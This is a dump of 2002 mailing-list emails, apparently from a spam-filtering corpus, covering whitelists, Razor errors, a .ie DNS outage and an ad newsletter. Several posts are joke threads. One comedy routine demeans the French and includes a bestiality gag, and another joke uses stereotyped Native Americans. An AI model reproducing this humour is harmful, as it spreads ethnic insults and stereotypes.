    <t>use Perl Daily Headline Mailer\n\nThis Week on perl5-porters (16-22 September 2002)\n    posted by rafael on Monday September 23, @07:58 (summaries)\n    [URL]http://use.perl.org[/URL]\n\nThe Great Perl Monger Cull Of 2002\n    posted by ziggy on Monday September 23, @16:38 (new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Robert Harley &lt;harley@argote.ch&gt;\nFrom: Tom &lt;tomwhore@slack.net&gt;\nDate: Tue, 23 Jul 2002 23:30:55 -0400 (EDT)</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 23:30:55 -0400 (EDT)</t>
  </si>
  <si>
    <t>On Wed, 24 Jul 2002, Robert Harley wrote:\n\n--]Working too hard...\n--]\n--]Someone tell me a joke, or email me a beer or something...\n\nYou asked for it....\n\nLadies and Gentlebeans....its time now for Shlepy Shlepman and Frenchy\nalong with there  all groan reviews.....\n\nShlepy&gt; Heya heya heya ..I just flew in from defcon and boy are my ports\ntierd.....waka waka\n\nFrenchie&gt;Des Amricains, je vous dteste et tous que vous reprsentez. Vous\ntes des porcs.\n\nShlepy&gt;Say Frenchie, how do you castrate a frenchmen???\n\nFrenchie&gt;Est-elle cette une autre mauvaise plaisanterie? Je ne sais pas,\nsatisfaire vous rends ce drole singe global d'ane.\n\nShlepy&gt;You kick his sister in the jaw.\n\nFrenchie&gt;Je suis dans l'enfer.\n\nShelpy&gt;Dont he speak funny folks? yep them French are mighty bizzare.\nThey do things very differently over there. For instace you know why\nthey dont have fireworks at Euro Disney?\n\nFrenchie&gt; Puisque nous soufflerions plutt nos ttes outre de qu'observe un\ninfrieur brut classer la clbration amricaine?\n\nShlepy&gt;What ever ya said, nope..Because every time they shoot\nthem off, the French try to surrender.\n\nFrenchie&gt;Etant donn le choix entre les Allemands et vous que je\nnettoierais heureusement versez les stalles dans les camps alors doivent\naller  vos parcs d'amusement.\n\nShlepy&gt; Aint he the continental one....Speaking of global\npolitics....Three guys, an Englishman, a Frenchman and an American are out\nwalking along the beach together one day. They come across a lantern and a\ngenie pops out of it.  "I will give you each one wish, " says the genie.\nThe American says, "I am a farmer, my dad was a farmer, and my son will\nalso farm. I want the land to be forever fertile in America." With a blink\nof the genie's eye, 'FOOM'  -  the land in America was forever made\nfertile for farming.  The Frenchman was amazed, so he said, "I want a wall\naround France, so that no one can come into our precious country."  Again,\nwith a blink of the Genie's eye, 'POOF'  -  there was a huge wall around\nFrance.  The Englishman asks, "I'm very curious. Please tell me more about\nthis wall.  The Genie explains, "Well, it's about 150 feet high, 50 feet\nthick and nothing can get in or out."  The Englishman says, "Fill it up\nwith water."\n\nFenchie&gt;Plutt nous devrions nous noyer que mangent la cuisine anglaise.\n\nShlpey&gt; Them French, you dont know what they are on about but damn it sure\nsounds romantic. And you knwo they are great lovers those french are. A\npsychology professor decided to study the way in which different people\nfrom different parts of Europe have sex with sheep. He traveled first to\nWales, where he asks a farmer to explain his method: "Well, boyo, I put\nher back legs down my nice green wellies, grab her with me velcro gloves,\nand we're well away. Tidy!"  The professor tries Scotland next "Hoots an'\ntoots man, I put her back legs down my nice green wellies, grab her with\nme velcro gloves, and we're  well away. Och aye tha noo!"  The professor\nmoves on to Germany: "Well, I find the most efficient way is to grab her\nwith my velcro gloves, and we're well away. The professor is noticing a\npattern developing, so he decides to try France, and then end his\ninvestigation.  He stops a bloke by the Eiffel tower named Pierre, and\nasks him to explain the French method: "Well monsieur, I put her back legs\ndown my nice green wellies, sling her front legs over me shoulders, and\nthat's all there is to it!" The professor is excited to have found some\nnational variation and tells Pierre that this is different to the methods\nof the Scots, Welsh and Germans. "How do they do it then?" asks Pierre,\nand the professor explains. Pierre on hearing the explanation walks of\ndisgusted. "What! No kissing?"\n\nFrenchie&gt;Voil. J'ai stopp.\n\nShlepy&gt; Hey, where you going with the sheep, we need them for the next\nact....\n\nA little traveling music maestro.\n\n\n\n-tomwsmf\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: "Joseph S. Barrera III" &lt;joe@barrera.org&gt;\nFrom: Eugen Leitl &lt;eugen@leitl.org&gt;\nDate: Tue, 23 Jul 2002 23:30:33 +0200 (CEST)</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 23:30:33 +0200 (CEST)</t>
  </si>
  <si>
    <t>On Tue, 23 Jul 2002, Joseph S. Barrera III wrote:\n\n&gt; BTW, guys, I'm *kidding*! I'm actually in a pretty good mood right now.\n&gt; I'm not actually a very hateful person, and I certainly can't think of\n&gt; anyone right now I hate, and certainly not anyone on this list!\n\nYou cannot fool us. We know you inside out.\n\nP.S. We hate you, too.\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: "R. A. Hettinga" &lt;rah@shipwright.com&gt;\nDate: Tue, 23 Jul 2002 23:22:04 -0400</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 23:22:04 -0400</t>
  </si>
  <si>
    <t>"Ouch. Ouch. Ouch. Ouch. Ouch...."(was Re: My brain hurts)</t>
  </si>
  <si>
    <t>At 5:47 PM -0700 on 7/23/02, Joseph S. Barrera III wrote: &gt;     And the pirate says, "Aaar, its driving me nuts!" I can do better pirate jokes than *that*. Like, what's the 18th letter of the Pirate alphabet? No? Okay, a pirate koan then. What's the sound of a pirate clapping? :-). Cheers, RAH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URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: "Gordon Mohr" &lt;gojomo@usa.net&gt;, &lt;fork@spamassassin.taint.org&gt;\nFrom: Mike Masnick &lt;mike@techdirt.com&gt;\nDate: Tue, 23 Jul 2002 23:11:33 -0700</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 23:11:33 -0700</t>
  </si>
  <si>
    <t>"Gordon Mohr" &lt;gojomo@usa.net&gt;, &lt;fork@spamassassin.taint.org&gt;</t>
  </si>
  <si>
    <t>At 10:46 PM 7/23/02 -0700, Gordon Mohr wrote:\n&gt;Surprised this wasn't already passed through here: about a \n&gt;week and a half ago, Walter Mossberg reviewed ChoicEMail, \n&gt;a spam-fighting tool where new, unknown senders have to \n&gt;request passage through your whitelist-based mailwall.\n\nLately, a fairly large % of the spam I've been getting has been coming from\nspam systems that forge my own address as the "from" address... Those spam\nmessages would get through any whitelist I set up (especially since I email\nstuff to myself all the time).  If whitelists become more popular, I\nimagine spammers will resort to doing that for the majority of their spams,\nmaking whitelists less helpful.\n\nPlus, I'm still not sure how I feel about whitelists.  I don't think I'm so\nspecial that people should need to fill out a special form just to send me\nemail.  I could see certain friends of mine getting fairly annoyed\n(especially those with multiple email addresses...).\n\n-Mike\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: iiu@taint.org\nFrom: John McCormac &lt;yyyycc@hackwatch.com&gt;\nDate: Tue, 23 Jul 2002 22:53:23 +0100</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 22:53:23 +0100</t>
  </si>
  <si>
    <t>John McCormac &lt;yyyycc@hackwatch.com&gt;</t>
  </si>
  <si>
    <t>Re: [IIU] IE nameserver problems</t>
  </si>
  <si>
    <t>James Raftery wrote:\n&gt; \n&gt; I don't know what role ns0 plays in relation to the IE zone. It's\n&gt; certainly not involved in the regular resolution process. It may\n&gt; be involved in zone distribution as you suggest. IIRC (and I often\n&gt; don't) on Friday ns0 had a serial that none of the IE nameservers\n&gt; shared. Unfortunately I don't have a record of that.\n\n&gt;&gt;From indexing CNO, ns0 appears to be IEDR's CNO nameserver for its CNO\ndomains (iedr.com and others).\n \n&gt; &gt; This whole thing does seriously bring into question IEDR's decision to\n&gt; &gt; outsource the technical admininstration of .ie to a company that\n&gt; &gt; apparently does not even admin its own DNS. It is a nice story though -\n&gt; &gt; almost as good as the time that .ie disappeared for 8 hours in July\n&gt; &gt; 1998.\n&gt; \n&gt; ... and only you noticed :)\n&gt; [ Messages on the IEDR-FORUM list at the time don't support\n&gt;   your assertion ]\n\nYeah but I was right and I was there. The people who were saying that it\ndid not happen did not see the fadeout in progress. It only came back\nafter the server was rebooted properly. However improbable it seemed at\nthe time, the nameservers came back up after a power outage without the\n.ie zonefile. As a result it, there was nothing in the file that the\nsecondaries picked up. At the time, I thought that the file was on an\nNFS. But if it regenerated after reboot, and the NFS input was not\nthere, it would have generated a blank zonefile - that makes some sense.\nHistory now but it has an alarming relevance. :)\n \n&gt; As an aside, shortly after my note on Friday uucp-gw-1.pa.dec.com and\n&gt; uucp-gw-2.pa.dec.com stopped responding to DNS requests. So IE had\n&gt; two dead nameservers, four stuck a week in the past and three\n&gt; working correctly. Marvellous.\n\nConfirm that. The nameservers themselves had connectivity problems from\nwhat I could see and it was going on for a while, even *after* the\ninitial SOA problems. \n\nI am thinking of writing a simple .ie secondary state monitor for\ninclusion on WhoisIreland.com as these guys seem to be technologically\nincapable of running their own DNSes. What kind of distorted logic hands\nthe admin of a national tld to a company that does not even handle DNS\nfor its own domain? Whatever selection process IEDR used should be\ninvestigated by the relevant government department, especially as the\ncompany supposedly providing technical administration to IEDR did not\nactually spot this loss of synch. The IEDR contract with the company\nshould be reviewed in the light of this event. This kind of 1 week loss\nof synch should not happen with a national domain. Ireland as E-hub -\nmore like e-jit central! :)\n\nRegards...jmcc\n-- \n********************************************\nJohn McCormac            * Hack Watch News\njmcc@hackwatch.com       * 22 Viewmount, \nVoice:   +353-51-873640  * Waterford,\nBBS&amp;Fax: +353-51-850143  * Ireland\n[URL]http://www.hackwatch.com[/URL]\n********************************************\n\n-----BEGIN PGP PUBLIC KEY BLOCK-----\nVersion: 2.6\n\nmQCNAzAYPNsAAAEEAPGTHaNyitUTNAwF8BU6mF5PcbLQXdeuHf3xT6UOL+/Od+z+\nZOCAx8Ka9LJBjuQYw8hlqvTV5kceLlrP2HPqmk7YPOw1fQWlpTJof+ZMCxEVd1Qz\nTRet2vS/kiRQRYvKOaxoJhqIzUr1g3ovBnIdpKeo4KKULz9XKuxCgZsuLKkVAAUX\ntCJKb2huIE1jQ29ybWFjIDxqbWNjQGhhY2t3YXRjaC5jb20+tBJqbWNjQGhhY2t3\nYXRjaC5jb20=\n=sTfy\n-----END PGP PUBLIC KEY BLOCK-----\n_______________________________________________\nIIU mailing list\nIIU@iiu.taint.org\n[URL]http://iiu.taint.org[/URL]</t>
  </si>
  <si>
    <t>http://www.hackwatch.com http://iiu.taint.org</t>
  </si>
  <si>
    <t>To: Robert Harley &lt;harley@argote.ch&gt;\nFrom: Wayne E Baisley &lt;baisley@alumni.rice.edu&gt;\nDate: Tue, 23 Jul 2002 22:36:02 -0500</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 22:36:02 -0500</t>
  </si>
  <si>
    <t>Perhaps it's time to revisit ...\n\n[URL]http://www.engrish.com[/URL]\n\n"evirob" is the essence of weird life.\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://www.engrish.com http://xent.com</t>
  </si>
  <si>
    <t>To: FoRK@xent.com\nFrom: Owen Byrne &lt;owen@permafrost.net&gt;\nDate: Tue, 23 Jul 2002 21:57:30 -0300</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 21:57:30 -0300</t>
  </si>
  <si>
    <t>Re: [NYT] Real Source</t>
  </si>
  <si>
    <t>Tom wrote:\n\n&gt;On Mon, 22 Jul 2002, Adam Rifkin wrote:\n&gt;\n&gt;--]By JOHN MARKOFF\n&gt;     Ahhh the ahole reporter we all love to sneer at:)-\n&gt;\n&gt;--]SAN FRANCISCO, July 21 -- In a significant challenge to Microsoft,\n&gt;--]RealNetworks plans to announce a new version of its software on Monday\n&gt;--]that can distribute audio and video in a range of formats, including\n&gt;--]Microsoft's own proprietary Windows Media.\n&gt;\n&gt;Real is more currupt that MS in so many real ways its astounding Real and\n&gt;MS CEOS dont felate each other at tech and mass media conferences.\n&gt;\n&gt;Real needs to die and die horribly. Thier biz practices alone give them an\n&gt;instant berth in the 5th circle of hell. ALl the crap they foist on\n&gt;systems during installation gets em free passes to all the other circles.\n&gt;\n&gt;[URL]http://xent.com[/URL]\n&gt;  \n&gt;\nWell, just to take this thread off topic - does anyone know what's \ninvolved in serving streaming video? I assume that\n the only practical alternatives are MS and Real, and that it's likely \nto cost some $$$ for the software.\nOwen\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: razor-users@example.sourceforge.net\nFrom: Patrick &lt;patrick@stealthgeeks.net&gt;\nDate: Tue, 23 Jul 2002 21:21:58 -0700 (PDT)</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 21:21:58 -0700 (PDT)</t>
  </si>
  <si>
    <t>[Razor-users] Authentication Error</t>
  </si>
  <si>
    <t>Today's error(received multiple times) was:\n\nJul 23 21:16:39.288680 report[98557]: [ 2]  Razor-Agents v2.12 starting\nrazor-report ./jobspam\nJul 23 21:16:46.597147 report[98558]: [ 1] razor-report error: reportit:\nError 213 while authenticating, aborting.\n\nI really like the concept of Razor but I find myself wondering if it's\nreally a good idea for the developers to be passing off what appears\nto be alpha-quality software as production-ready....\n\n\n/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\\n                               Patrick Greenwell\n         Asking the wrong questions is the leading cause of wrong answers\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: rODbegbie &lt;rOD@arsecandle.org&gt;\nFrom: Ross Vandegrift &lt;ross@willow.seitz.com&gt;\nDate: Tue, 23 Jul 2002 21:00:08 -0400</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 21:00:08 -0400</t>
  </si>
  <si>
    <t>Ross Vandegrift &lt;ross@willow.seitz.com&gt;</t>
  </si>
  <si>
    <t>Re: [SAtalk] Re: [SAdev] Scoring Yahoo Ads</t>
  </si>
  <si>
    <t>On Tue, Jul 23, 2002 at 03:43:24PM -0400, rODbegbie wrote:\n&gt; &gt; It's quite clear that most of this list does not consider\n&gt; &gt; all advertisement to be spam, particularly when attached to a valid\n&gt; &gt; personal email by a third-party service.\n&gt; \n&gt; Cool.  So we're all in agreement then.  Except for Marc.\n\nSo what brilliant metric do you have in mind to measure unsolicited vs.\nsolicited commercial email?\n\nI know I've registered for many commercial lists that send material that\nreally reads like spam.  Moreover, spammers will be able to circumvent\nSA if they make spam look like this SCE.  This kind of convergence of the\ntwo.... well, it stinks.  We can kill SCE, or we can cripple\nidentification of UCE.\n\nObviously an interim solution is to whitelist, but long term is probably\nharder.  What kind of SCE, like MSDN newsletters, product updates, etc\nis in the corpus for the GA?  Maybe seeding the corpus with a bigger set\nof these type of mails will have some interesting/useful results.\n\nRoss Vandegrift\nross@willow.seitz.com\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nSpamassassin-talk mailing list\nSpamassassin-talk@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: Owen Byrne &lt;owen@permafrost.net&gt;\nDate: Tue, 23 Jul 2002 20:42:35 -0300</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 20:42:35 -0300</t>
  </si>
  <si>
    <t>My only joke, thanks to a professor at the University of Manitoba, circa \n1997. Set in the old west.\n\nA cowboy is riding along on his favorite horse when he's suddenly \nsurrounded and taken prison by a band of roaming Indians. The indians \ntake the cowboy and his horse and tell him the traditional way that the \ntribe deals with their victims:\nEach day for the next 3 days, you get a wish. If its in our power to \ngrant it to you, we will. After the 3rd wish is done, you die a horrible \nslow death. Time for your first wish.\n\nThe cowboy thinks a bit, and says "I want to talk to my horse." So the \nindians bring the horse over, the cowboy whispers in his ears, and the \nhorse runs off. A little while later the horse comes back with a \nbeautiful blond naked woman. The cowboy and the woman go in the tent, \nappropriate noises are heard, and then the horse takes the woman away.\n\nThe next day, time for the wish comes, and the Indians, amazed at \nyesterday's performance, all gather round. The cowboy says "I want to \ntalk to my horse". So the horse is brought over, the cowboy whispers in \nits ears, and the horse takes off. A little while later the horse comes \nback, with a beautiful brunette, naked, same routine as before, cowboy \nand the women go in the tent, ..., etc.\n\nOn the third and final day, the indians are totally amazed, and are \neager to hear what the cowboy's wish will be. So they all gather round, \nand the cowboy again says "I want to talk to my horse." The horse is \nbrought over, and this time the cowboy grabs the horse by the head, \nstares right at him, and says -- "Read my lips -- Posse! Posse!"\nOwen\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: "Jost.Krieger+freetechmail@ruhr-uni-bochum.de " &lt;Jost.Krieger+freetechmail@ruhr-uni-bochum.de&gt;\nFrom: "DesktopEngineer.com" &lt;mailer@desktopengineer.com&gt;\nDate: Tue, 23 Jul 2002 20:13:02 -0400</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 20:13:02 -0400</t>
  </si>
  <si>
    <t>"DesktopEngineer.com" &lt;mailer@desktopengineer.com&gt;</t>
  </si>
  <si>
    <t>"Jost.Krieger+freetechmail@ruhr-uni-bochum.de " &lt;Jost.Krieger+freetechmail@ruhr-uni-bochum.de&gt;</t>
  </si>
  <si>
    <t>[DEJD] DesktopEngineer.com Headlines - $200 For The Best Submission</t>
  </si>
  <si>
    <t>This is a MIME message. If you are reading this text, you might want to consider changing to a mail reader that understands how to properly display MIME multipart messages. --Boundary-=_bcea19c9d6337c63081baf1d5ee3466aa Content-Type: multipart/alternative; charset = "iso-8859-1"; 	boundary="Boundary-=_sb73baa252922041f1e5a038a67575b2a2"; --Boundary-=_sb73baa252922041f1e5a038a67575b2a2 Content-Type: text/plain; charset = "iso-8859-1"; Content-Transfer-Encoding: 8bit If you are seeing this message, please visit [URL]http://desktopengineer.com[/URL] to see the latest stories. --Boundary-=_sb73baa252922041f1e5a038a67575b2a2 Content-Type: text/html; charset = "iso-8859-1"; Content-Transfer-Encoding: 8bit Desktop Engineers Junk Drawer - Handy Odds N Ends for Windows 98, NT 		and 2000    Desktop Engineer's Junk Drawer 			 Headline Mailer! To subscribe, send a blank 			 email to: dejdweekly-subscribe@topica.com   ADVERTISEMENT Discover the Powerful 								  Repackaging Capabilities of AdminStudio Let InstallShield 								  show you the easy process for converting packages to MSI by demonstrating an 								  application conversion using AdminStudio 3. Get detailed explanations of many 								  best practices, and don't miss the Q&amp;A session afterwards. Register Now! 								  [URL]http://www.installshield.com[/URL]  DesktopEngineer.com Giving Away $200 Submission Of The 			 Month Award Friday, July 12 2002 @ 07:41 AM EDT by Darwin_Sanoy How about a little cash to buy something really cool? Send us 				those tips!  [URL]http://desktopengineer.com[/URL] Microsoft Webcast: WMIC: Managing Windows from a Command Line (07/24/02 			 @ 10am PST) Thursday, July 11 2002 @ 11:22 AM EDT by Darwin_Sanoy WMI is the powerful management API Microsoft built into Windows 				2000. Getting scripted access to this management functionality can not be done 				through shell scripts - until WMIC was released with XP.  [URL]http://desktopengineer.com[/URL] Wise Black Belt Series: Application Isolation Webinar Wednesday, 			 July 10 2002 @ 06:12 AM EDT by Darwin_Sanoy Session: Application Isolation and Windows Installer This 				webinar covered how .LOCAL and .NET (Manifests) isolation work. Webinar 				included demonstrations of both isolation technologies for traditional 				applications.  [URL]http://desktopengineer.com[/URL] Nice Linksys 4 Port USB Mini-Hub for $11.65 at Buy.com Tuesday, 			 July 09 2002 @ 07:55 AM EDT by Darwin_Sanoy This is a great prices for four ports!  [URL]http://desktopengineer.com[/URL]   ADVERTISEMENT Discover the Powerful 								  Repackaging Capabilities of AdminStudio Let InstallShield 								  show you the easy process for converting packages to MSI by demonstrating an 								  application conversion using AdminStudio 3. Get detailed explanations of many 								  best practices, and don't miss the Q&amp;A session afterwards. Register Now! 								  [URL]http://www.installshield.com[/URL]   Â Copyright Â© 2002 			 Desktop Engineers Junk Drawer, ISSN: 1522-7693 Â All trademarks and 			 copyrights on this page are owned by their respective owners.   --Boundary-=_sb73baa252922041f1e5a038a67575b2a2-- --Boundary-=_bcea19c9d6337c63081baf1d5ee3466aa--</t>
  </si>
  <si>
    <t>http://desktopengineer.com http://www.installshield.com http://desktopengineer.com http://desktopengineer.com http://desktopengineer.com http://desktopengineer.com http://www.installshield.com</t>
  </si>
  <si>
    <t>To: "Tabor J. Wells" &lt;razor-users@fsckit.net&gt;\nFrom: Scott Henderson &lt;boyhowdy@cyberspace.org&gt;\nDate: Tue, 23 Jul 2002 19:30:11 -0400 (EDT)</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 19:30:11 -0400 (EDT)</t>
  </si>
  <si>
    <t>Scott Henderson &lt;boyhowdy@cyberspace.org&gt;</t>
  </si>
  <si>
    <t>Re: [Razor-users] can't find Razor/Client.pm</t>
  </si>
  <si>
    <t>&gt;&gt; Thanks, Tabor.  How do I install v1 over v2, and where does one\n&gt;&gt; get it?  (I don't see it at razor.sourceforge.net)\n&gt;\n&gt;It's there. Scroll down on the downloads page. However you might\n&gt;consider going the other way and installing SpamAssassin's 2.40\n&gt;bleeding-edge code as Razor v2 has a lot of nice features over v1.\n\nHmmm... installed SA 2.40, but I get the same error when trying\nto launch amavisd-new (can't find Razor/Client.pm).  Seems like\nthe amavis code is calling for this.  I'll hit up the\namavis-users list.  (Feel free to fire off the answer if you\nhave it, though!   :)\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: CDale &lt;cdale@techmonkeys.net&gt;\nDate: Tue, 23 Jul 2002 19:26:48 -0500 (CDT)</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 19:26:48 -0500 (CDT)</t>
  </si>
  <si>
    <t>moooozilla</t>
  </si>
  <si>
    <t>funny load message:\nmoo!moo!moo!moo!moo!moo!moo!moo!moo!moo!moo!moo!Document [URL]http://flog.us[/URL] \nloaded successfully\n\nteehee\nC\n\n-- \n"My theology, briefly, is that the universe was dictated but not\n          signed."  (Christopher Morley) \n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://flog.us http://xent.com</t>
  </si>
  <si>
    <t>To: Udhay Shankar N &lt;udhay@pobox.com&gt;\nFrom: "Joseph S. Barrera III" &lt;joe@barrera.org&gt;\nDate: Tue, 23 Jul 2002 19:25:05 -0700</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 19:25:05 -0700</t>
  </si>
  <si>
    <t>Udhay Shankar N wrote:\n &gt; Heh. The name of the band is SO appropriate...:)\n\nLOL, literally, actually. :-)\n\n &gt; And I, get sick when I'm around, I, can't stand to be around I, hate\n &gt; everything about you!\n\nOne of my favorite pieces of graffti that I have spotted was at UCI,\nand it read:\n\n     I am sick when I think of Jesus\n\nIt has so many meanings, and so many of them are disturbing, especially\nto a former good little Catholic boy like me.\n\n- Joe\n\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: spamassassin-talk@example.sourceforge.net\nFrom: bob@proulx.com (Bob Proulx)\nDate: Tue, 23 Jul 2002 19:19:27 -0600</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 19:19:27 -0600</t>
  </si>
  <si>
    <t>--PEIAKu/WMn1b1Hv9\nContent-Type: text/plain; charset=us-ascii\nContent-Disposition: inline\n\n&gt; PS I know my English isn't good, but... "negative score added", can\n&gt; you really say that? Adding something negative... hmmm...\n\nYes, that is perfectly legitimate.  It is a math / accounting thing.\nYou get a paycheck for $100.  You get a bill for $20.  You add them\nup.  Some of the additions are negitive debit amounts.  My bank\nstatement always has a long list of + items and - items.  If I can\nkeep the + items more than the - items I am doing good.\n\nBob\n\n\n--PEIAKu/WMn1b1Hv9\nContent-Type: application/pgp-signature\nContent-Disposition: inline\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.0.7 (GNU/Linux)\n\niD8DBQE9PgCf0pRcO8E2ULYRAtnpAJ4j3rke5AmfV6FuJ0rvPvwwkEPWKwCff1CF\n1VPYcaD2pk78qQXEfPMlRqw=\n=Qa5S\n-----END PGP SIGNATURE-----\n\n--PEIAKu/WMn1b1Hv9--\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nSpamassassin-talk mailing list\nSpamassassin-talk@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: "Tabor J. Wells" &lt;razor-users@fsckit.net&gt;\nFrom: Theo Van Dinter &lt;felicity@kluge.net&gt;\nDate: Tue, 23 Jul 2002 19:11:28 -0400</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 19:11:28 -0400</t>
  </si>
  <si>
    <t>On Tue, Jul 23, 2002 at 06:16:02PM -0400, Tabor J. Wells wrote:\n&gt; It's there. Scroll down on the downloads page. However you might\n&gt; consider going the other way and installing SpamAssassin's 2.40\n&gt; bleeding-edge code as Razor v2 has a lot of nice features over v1.\n\nTo paraphrase something I heard once:\nUnless you like looking for a new job, never install a non-released or\ndevelopment-only version of software anywhere where the results of such\ncode are important.\n\nie: Don't run development code on a production machine. :)\n\n\nThe problem isn't SA anyway, it looks for Razor1 and just keeps on\ngoing if it can't find it.  Something came up about amavis on the SA\nlist where it looks for Razor itself...\n\n-- \nRandomly Generated Tagline:\n"Duct tape is like the force; it has a light side &amp; a dark side, and it\n holds the universe together." - Zen Musings\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: spamassassin-talk@example.sourceforge.net\nFrom: "Derrick 'dman' Hudson" &lt;dman@dman.ddts.net&gt;\nDate: Tue, 23 Jul 2002 19:10:11 -0500</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 19:10:11 -0500</t>
  </si>
  <si>
    <t>"Derrick 'dman' Hudson" &lt;dman@dman.ddts.net&gt;</t>
  </si>
  <si>
    <t>[SAtalk] Re: Reporting....</t>
  </si>
  <si>
    <t>--1yeeQ81UyVL57Vl7\nContent-Type: text/plain; charset=us-ascii\nContent-Disposition: inline\nContent-Transfer-Encoding: quoted-printable\n\nOn Tue, Jul 23, 2002 at 09:37:33AM -0500, Joel Epstein wrote:\n| I currently have spam being filtered for about 50 users via spamd.=20\n| Works perfectly!  However, is there anyone out there providing reports=20\n| to their users about what was filetered?  Maybe just something like=20\n| date/time, From, and subject?\n\nI have such a system.  It works like this :\n    1)  sa-exim scans the message during the SMTP interaction\n    2)  if it scores high enough it is rejected\n        2.1)    if it is rejected, exim mentions that in the reject log\n        2.2)    if it isn't rejected it is delivered\n            2.2.1)  it is up to the user to deal with (filter as\n                    desired) the lower-scoring spam\n    3)  I have a script run as a daily cron job to run through the\n        reject log and deposit a report in the user's home directory\n        indicating what was rejected and way (SA isn't the only cause\n        for rejection)\n\nObviously my setup is rather tied to exim and sa-exim, but if you want\nthe reporting script I can send it to you.\n\n-D\n\n--=20\nMicros~1 :\n For when quality, reliability\n  and security just aren't\n   that important!\n=20\n[URL]http://dman.ddts.net[/URL]\n\n--1yeeQ81UyVL57Vl7\nContent-Type: application/pgp-signature\nContent-Disposition: inline\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.0.6 (GNU/Linux)\nComment: For info see [URL]http://www.gnupg.org[/URL]\n\niEYEARECAAYFAj098GMACgkQO8l8XBKTpRSdOwCgqJ0hH/x1kyhw8T4tcr2iO0bj\nfmIAn14hxwcq8fit2RZFidifHufuC9qF\n=2GIQ\n-----END PGP SIGNATURE-----\n\n--1yeeQ81UyVL57Vl7--\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nSpamassassin-talk mailing list\nSpamassassin-talk@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>http://dman.ddts.net http://www.gnupg.org http://thinkgeek.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: Rohit Khare &lt;khare@alumni.caltech.edu&gt;\nFrom: "Joseph S. Barrera III" &lt;joe@barrera.org&gt;\nDate: Tue, 23 Jul 2002 18:50:53 -0700</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 18:50:53 -0700</t>
  </si>
  <si>
    <t>Rohit Khare wrote: &gt; Yes, on a mailing list awash in crap -- and some it is even unsolicited  &gt; commercial email, heavens! -- our trusty mailman filters captured and  &gt; quarantined just two posts that week, one from me that was &gt; 100K (the  &gt; fat articles) and one that was bcc:d (the invite). Wait... I didn't think we had any filters set up on FoRK. Kragen, do you know of any? I personally have FoRK delivered to an address (napier%waste.org) that has SpamAssassin enabled, agressively, where it just nukes anything it thinks is spam. Usually I figure if I miss a FoRK post, no big deal, I'll pick it up by the replies if it's interesting. For personal mail (joe%barrera.org) I either don't use SpamAssassin, or use it but where it just flags messages instead of nuking them. So if someone is sending a message just to me, I'll get it even if it looks like spam. So in other words, Rohit, if you had sent to joe%barrera.org, I guess I would have received it in a timely fashion. So where's all that booze? When's the retry? Every robust protocol needs a retry strategy -- 